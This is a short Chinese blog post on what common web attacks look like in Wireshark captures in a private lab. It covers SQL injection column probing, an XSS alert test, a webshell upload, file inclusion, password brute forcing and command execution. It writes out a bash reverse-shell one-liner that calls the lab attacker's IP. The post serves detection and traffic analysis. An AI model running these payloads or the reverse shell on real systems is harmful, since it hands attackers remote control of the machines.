Web漏洞攻击的流量特征

环境:

        流量分析工具:Wireshark

        靶机ip:10.4.7.130

        攻击机IP:10.4.7.138

流量分析

SQL注入

 使用order by判断列数

wireshark抓包     

order by 15成功,order by 16失败,说明列数为15 选择追踪流    

抓到关键字order by 16

XSS

搜索框输入

<script>alert(1)</script>

出现弹窗

WireShark抓包,抓到关键字script alert

文件上传

上传一句话木马文件

WireShark抓包

文件包含

访问phpinfo文件WireShark抓包

密码爆破

bp抓包

bp密码爆破

WireShark流量分析

发现大量登陆信息

命令执行

攻击机

 WireShark抓包

反弹shell

kali 监听

Centos 7输入反弹shell指令

bash -i >& /dev/tcp/10.4.7.138/8888 0>&1

在kali中可以看到反弹shell到了Centos 7输入反弹shell的路径下

在wireshark中看到 追踪流看到反弹shell的路径kali中输入 ls ,再次追踪流,查看到命令

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值